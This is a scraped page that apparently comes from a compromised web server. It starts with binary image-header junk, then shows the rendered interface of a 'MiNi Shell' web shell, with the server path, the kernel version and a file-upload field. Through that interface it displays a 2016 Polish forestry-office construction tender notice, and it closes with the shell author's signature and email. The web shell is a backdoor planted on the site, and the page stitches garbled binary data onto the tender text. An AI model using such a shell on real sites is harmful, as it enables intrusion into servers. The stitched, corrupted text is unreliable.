JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160722/151795-N-2016.html

<p class="kh_header"><b>Stalowa Wola: Budowa kancelarii leśniczego wraz z niezbędną infrastrukturą techniczną na działce o nr ewid. 8019/7 w obrębie ewidencyjnym Grębów</b><br>
<b>Numer ogłoszenia: 151795 - 2016; data zamieszczenia: 22.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Rozwadów , ul. Przemysłowa 1, 37-465 Stalowa Wola, woj. podkarpackie, tel. 15 8421755, faks 15 842 15 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rozwadow.lublin.lasy.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kancelarii leśniczego wraz z niezbędną infrastrukturą techniczną na działce o nr ewid. 8019/7 w obrębie ewidencyjnym Grębów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a.ŁAWY FUNDAMENTOWE
W budynku zaprojektowano ławy fundamentowe prostokątne monolityczne o wysokości
30,00 cm i szerokości 45,00 cm, posadowione na głębokości - 1,10 m poniżej poziomu rodzimego
gruntu, z betonu klasy C16/20, zbrojone podłużnie czterema prętami żebrowanymi o średnicy 12 mm, ze stali A - III 34Gs i strzemionami ze stali gładkiej A - I St3S o średnicy 6 mm w rozstawie co 20,00 cm. Zaprojektowano również dwie stopy fundamentowe kwadratowe monolityczne o wysokości 30,00 cm i szerokości 65,00 cm, posadowione na głębokości - 1,10 m poniżej poziomu rodzimego gruntu, z betonu klasy C16/20, zbrojone dwukierunkowo siatką z prętów żebrowanych o średnicy 12 mm, ze stali A - III 34Gs o rozstawie co 15,00 cm.
b.ŚCIANY ZEWNĘTRZNE
Ściany zewnętrzne fundamentowe projektowane częściowo z bloczków betonowych grubości 24,00 cm, ścianę należy zakończyć wieńcem, zaprojektowanym jako monolityczny z betonu klasy
C16/20 o wymiarach 25,00 x 25,00 cm, zbrojonym podłużnie czterema prętami o średnicy 12 mm ze stali A - III 34Gs i poprzecznie strzemionami o średnicy prętów 6 mm o rozstawie co 25,00 cm. Na stopach fundamentowych przewidziano słupy murowane z bloczków betonowych o wymiarach 25,00
x 25,00 cm do wysokości górnej powierzchni wylewki betonowej tarasu.
Ściany zewnętrzne fundamentowe budynku zaprojektowano jako dwuwarstwowe. Ściany konstrukcyjne zewnętrzne projektowane z pustaków ceramicznych grubości 25,00 cm, należy zakończyć wieńcem, zaprojektowanym z betonu klasy C16/20 o wymiarach 25,00 x 25,00 cm, zbrojonym podłużnie czterema prętami o średnicy 12 mm ze stali A - III 34Gs i poprzecznie
strzemionami o średnicy prętów 6 mm o rozstawie co 25 mm.
Ściany zewnętrzne budynku zaprojektowano jako dwuwarstwowe:
c.ŚCIANY DZIAŁOWE
Ściany działowe zaprojektowano z cegły ceramicznej pełnej, o grubości 12,00 cm, na zaprawie cementowej. Ściany wewnętrzne działowe budynku zaprojektowano jako jednowarstwowe.
d.IZOLACJA POZIOMA I PIONOWA ŚCIAN PODZIEMIA
W budynku przewidziano następujące izolacje wodochronne:
-Izolacje przeciwwilgociowe poziome:
- Izolacja na ławach fundamentowych - dwie warstwy papy bitumicznej podkładowej lub
foli PCV - przeznaczonej do izolacji fundamentów,
- Izolacja posadzki - warstwa folii - przeznaczonej do izolacji posadzki.
- Izolacje przeciwwilgociowe pionowe:
- Izolacja z masy bitumicznej malowanej dwa razy po obu stronach bloczków
betonowych i żelbetowych ścian fundamentowych podziemia.
e.SŁUPY ZEWNĘTRZNE
Słupy zewnętrzne zaprojektowano jako murowane, z cegły ceramicznej pełnej na zaprawie cementowej, o wymiarach 25,00 x 25,00 i wysokości wskazanej w części rysunkowej projektu .
f.NADPROŻA OKIENNE I DRZWIOWE
W budynku przewidziano nadproża okienne i drzwiowe jako systemowe typu L19. Przekroje i długości nadproży podano w części rysunkowej - rzut nadproży.
g.WIENIEC
Wieniec żelbetowe zaprojektowano jako monolityczny z betonu C16/20 zbrojone górą i dołem po dwa pręty żebrowane ze stali A - III 34Gs i poprzecznie strzemionami o średnicy prętów 6 mm o rozstawie co 25,00 cm o wymiarach 25,00 x 25,00 cm
h.STROP
W budynku zaprojektowano strop konstrukcji drewnianej, z drewna klasy C30 o wymiarach belek stropowych 80 x 180 mm, ułożonych według rysunku znajdującego się w części rysunkowej. Belki stropowe muszą opierać się minimum 12,00 cm na wieńcu. Miejsce oparcia się belek stropowych na murze należy odizolować od ściany za pomocą papy. Wszystkie elementy drewniane należy zabezpieczyć przed korozją biologiczną środkiem impregnującym. Połączenie elementów drewnianych zaprojektowano z blachy perforowanej, gwoździ i śrub oraz wkrętów.
i.DACH
W budynku zaprojektowano dach dwuspadowy, konstrukcji krokwiowo- jętkowej, z drewna klasy C30, o kącie nachylenia połaci dachowej 30o. Zaprojektowano następujące wymiary elementów
więźby dachowej:
- krokiew 80 x 180 mm,
- murłata 140 x 140 mm,
- jętka 80 x 180 mm,
Pokrycie dachu nad budynkiem zaprojektowano z blacho dachówki, mocowanej do łat. Murłatę należy odizolować od ściany za pomocą papy. Wszystkie elementy drewniane należy zabezpieczyć przed korozją biologiczną środkiem impregnującym. Połączenie elementów drewnianych zaprojektowano z blachy perforowanej, gwoździ i śrub oraz wkrętów.
j.KOMINY
W budynku doprojektowano 2 kominy tradycyjne z cegły pełnej na zaprawie cementowo - wapiennej. W kominach tych przewidziano kanały wentylacyjne o przekroju 140 x 140 mm. Pod kominem zaprojektowano poziomą izolację przeciwwilgociową z 2 warstw papy zgrzewalnej ułożoną na poziomie stropu. Wyloty z kanału spalinowego przewidziano wyprowadzić pionowo do góry, osłaniając je nasadkami zapobiegającymi wnikaniu wody opadowej i stabilizującymi ciąg
kominowy. Wyloty kanałów wentylacyjnych zaprojektowano w bocznych ściankach komina, zapewniając obustronny wylot powietrza. Czapę kominową betonową przewidziano odizolować dwiema warstwami papy asfaltowej od trzonu komina z odsadzką - kapinosem o szerokości maksymalnej 60 mm.
k.PODŁOGI I POSADZKI
W pomieszczeniach przewidziano posadzkę z płytek ceramicznych układanych na zaprawie klejącej do wylewki betonowej. Wylewkę należy zagruntować przed przystąpieniem do układania płytek.
l.DRZWI I OKNA
W budynku zaprojektowano stolarkę okienną i drzwiową o wymiarach typowych drewnianą bądź z PCV z nawietrznikami higrosterowanymi umieszczonymi w górnej części ościeżnicy.
m.RYNNY I RURY SPUSTOWE, OBRÓBKI BLACHARSKIE
Jako odprowadzenie wody z połaci dachowych zaprojektowano rury spustowe o średnicy 100 mm i rynny o średnicy 125 mm z PCW.
n.TYNKI LUB OKŁADZINY WEWNĘTRZNE
Tynki zaprojektowano jako cementowo - wapienne grubości 15 mm.
o.ROBOTY MALARSKIE
Ściany wewnętrzne przewidziano pomalować farbą emulsyjną lub akrylową w kolorach wybranych przez inwestora.
p.CIĄGI PIESZE
- chodniki z kostki brukowej
q.OGRODZENIE
- ogrodzenie panelowe z siatki
- brama wjazdowa z furtka z siatki
r.OGRZEWANIE I KLIMATYZACJA
- ogrzewanie elektryczne - grzejniki elektryczne naścienne
- instalacja klimatyzacji
r.INSTALACJA WODNO- KANLIZACYJNA 
- przyłącz wodny
- instalacja wody zimnej
- instalacja wody ciepłej
- instalacja kanalizacji sanitarnej
- bezodpływowy zbiornik na nieczystości ciekłe
- instalacja klimatyzacji
s.INSTALACJA ELEKTRYCZNA
- zasilanie budynku leśniczówki kablem ziemnym
- tablice rozdzielcze
- wewnętrzna linia zasilająca
- instalacja oświetleniowa 
- instalacja siłowa
- instalacja piorunochronna
- uziom otokowy
- oświetlenie zewnętrzne
- ochrona przeciwprzepięciowa
- połączenia wyrównawcze
- ochrona od porażeń elektrycznych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówień w wysokości do 50% wartości zamówienia. Zamówienie uzupełniające może być udzielone w okresie 3 lat od daty udzielenia zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.20.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości: 4 500,00 zł. (słownie:  cztery tysiące pięćset złotych 00/100) 
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.z 2007 r, nr 42, poz,275 , z poźn. zmianami).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: BGŻ  S.A. O/Stalowa Wola nr 76 2030 0045  1110 0000 0021 3010 z dopiskiem na blankiecie przelewu - wadium /Budowa kancelarii leśniczego wraz z niezbędna infrastrukturą techniczną na działce o nr ewid. 8019/7 w obrębie ewidencyjnym Grębów/. W przypadku wnoszenia wadium w innej formie niż w pieniądzu - oryginał dokumentu wadium musi być dołączony do oferty. Dokument powinien być dołączony do oferty w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej trzy roboty budowlane odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia (polegające na odbudowie , rozbudowie i nadbudowie obiektu budowlanego), o wartości nie mniejszej niż   180 000,00 zł. brutto każda, odpowiednio potwierdzonych, że zostały wykonane w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełniania ww. warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponuje lub będzie dysponować minimum po jednej osobie na każde z poniżej wymienionych stanowisk:
a) Kierownik budowy:
 Wymagane kwalifikacje i doświadczenie zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności konstrukcyjno-budowlanej oraz co najmniej 12-miesięczne doświadczenie zawodowe w zarządzaniu inwestycją budowlaną na stanowisku Kierownika budowy, w tym doświadczenie, na co najmniej jednym zadaniu inwestycyjnym, polegającym na budowie lub przebudowie 1 obiektu budowlanego (zgodnie z definicjami ustawy Prawo budowlane - t.j. Dz.U z 2013 poz. 1409 z późn. zm.) wraz z urządzeniami infrastruktury technicznej, o całkowitej wartości robót budowlanych nie mniejszej niż 150 000,00 zł brutto i o kubaturze obiektu min. 700 m3. 
b) Kierownik robót elektrycznych;
 Wymagane kwalifikacje i doświadczenie zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacji w zakresie sieci, instalacji i urządzeń elektrycznych posiadający,  co najmniej 36-miesięczne doświadczenie zawodowe w kierowaniu robotami elektrycznymi. 
c) Kierownik robót sanitarnych;
 Wymagane kwalifikacje i doświadczenie zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacji w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych posiadający, co najmniej 36-miesięczne doświadczenie zawodowe w kierowaniu robotami sanitarnymi.
 Uwaga: Zamawiający nie dopuszcza łączenia wyżej wskazanych stanowisk.                                                                                                     Zamawiający w zakresie uprawnień budowlanych dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2013 r, poz. 1409  z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych w państwach członkowskich (Dz.U. z 2008 r. nr 63 poz. 394).
Wszystkie osoby zatrudnione przy realizacji zamówienia muszą biegle posługiwać się językiem polskim, w przeciwnym wypadku Wykonawca udostępni wystarczającą liczbę kompetentnych tłumaczy, wykazujących znajomość języka technicznego w zakresie terminologii budowlanej we wszystkich specjalnościach występujących przy realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. dowody potwierdzające, że roboty wykazane w zał. nr 5 zostały wykonane w sposób należyty oraz wskazujące czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający ustala, że robotami najważniejszymi są roboty potwierdzające warunki udziału w postępowaniu (wykazane w zał. nr 5). Dowodami tymi będą poświadczenia zamawiającego na rzecz, którego roboty budowlane zostały wykonane, a gdy z uzasadnionych przyczyn o charakterze obiektywnym Wykonawca nie może uzyskać takiego poświadczenia - inne dokumenty. 2. Do przygotowania oferty - kosztorys ofertowy, dowód wniesienia wadium, w przypadku podpisania oferty przez pełnomocnika - stosowne pełnomocnictwo w oryginale lub kopi poświadczonej przez notariusza</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszcza się możliwość zmiany terminu wykonania umowy z powodu: 
a)Opóźnienia w rozstrzygnięciu przetargu ( umowa o zamówienie publicznie zostanie podpisana po upływie 30 dni od terminu otwarcia ofert),
b)Opóźnienia w przekazaniu przez Zamawiającego placu budowy (przekazanie powinno nastąpić w ciągu pięciu dni od daty podpisania umowy);
c)Wstrzymania robót przez Zamawiającego;
d)Wprowadzenia zmian w dokumentacji technicznej przedmiotu zamówienia w terminie uniemożliwiającym dotrzymanie terminu umownego wykonania robót;
e)Przerw w realizacji robót, spowodowanych warunkami atmosferycznymi negatywnie wpływającymi na jakość lub trwałość wykonania przedmiotu umowy, a szczególności zalanie terenu wodą;
f)Przerw w realizacji robót w przypadku odkrycia niewypałów, niewybuchów a także odkryć archeologicznych.
g)Wystąpienie siły wyższej w rozumieniu § 14 ust 2 umowy.
2. Termin zakończenia wykonania przedmiotu umowy zostanie przesunięty o okres trwania przeszkód wymienionych w ust. 5. W tym przypadku nie stosuje się kar umownych.
3.Dopuszcza się możliwość zmian treści umowy dotyczących:
1)zmiany wynagrodzenia w przypadku;
a) ustawowej zmiany podatku VAT;
b) nie wykonania całkowitego zakresu robót objętych umową, 
c) wstrzymania realizacji zadania inwestycyjnego przez Zamawiającego, 
d)konieczności wykonania robót dodatkowych;
2)zmiany kierownika budowy i kierowników robót; 
3)zmiany przedstawiciela Zamawiającego (inwestora); 
4)innych nieistotnych zmian, które nie miały wpływu na wybór najkorzystniejszej oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.rozwadow.lublin.lasy.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Rozwadów 37-465 Stalowa Wola ul. Przemysłowa 1, pok. nr 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2016 godzina 11:00, miejsce: Siedziba Zamawiającego: Nadleśnictwo Rozwadów 37-465 Stalowa Wola ul. Przemysłowa 1, pok. nr 11 /sekretariat/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com